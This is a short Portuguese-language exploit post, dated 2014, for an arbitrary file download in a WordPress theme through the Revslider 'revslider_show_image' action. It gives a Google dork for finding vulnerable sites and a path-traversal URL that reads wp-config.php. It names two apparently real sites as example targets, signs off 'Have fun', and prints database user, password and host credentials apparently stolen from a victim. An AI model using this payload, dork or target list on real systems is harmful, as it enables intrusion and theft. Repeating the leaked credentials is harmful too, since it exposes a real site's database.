- # WordPress Ultimate Theme Arbitrary File Download
- # Risco: Alto
- # Número CWE: CWE-200
- # Autor: Hugo Santiago
- # Contato: hugo.s@linuxmail.org
- # Data: 31/08/2014
- # Vendedor Homepage: http://www.techerhut.com/download-x-v1-7-5-the-ultimate-wordpress-theme-themeforest/
- # Testado em: Windows 7 and Gnu/Linux
- # Google Dork: "Index of" +/wp-content/themes/ultimate/
- # Patch vul : /wp-content/themes/ultimate/
- # Exploit(Revslide):
# PoC :
- http://vitima/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Exemplo config.php
- http://iai.pt/wp/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
- http://www.wanderlogic.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Have fun
- define('DB_USER', 'admincom1');
- define('DB_PASSWORD', '!J5XnVsc%');
- define('DB_HOST', 'mysql.admincom.com.br');
Imagem Ilustrativa
0 comentários:
Postar um comentário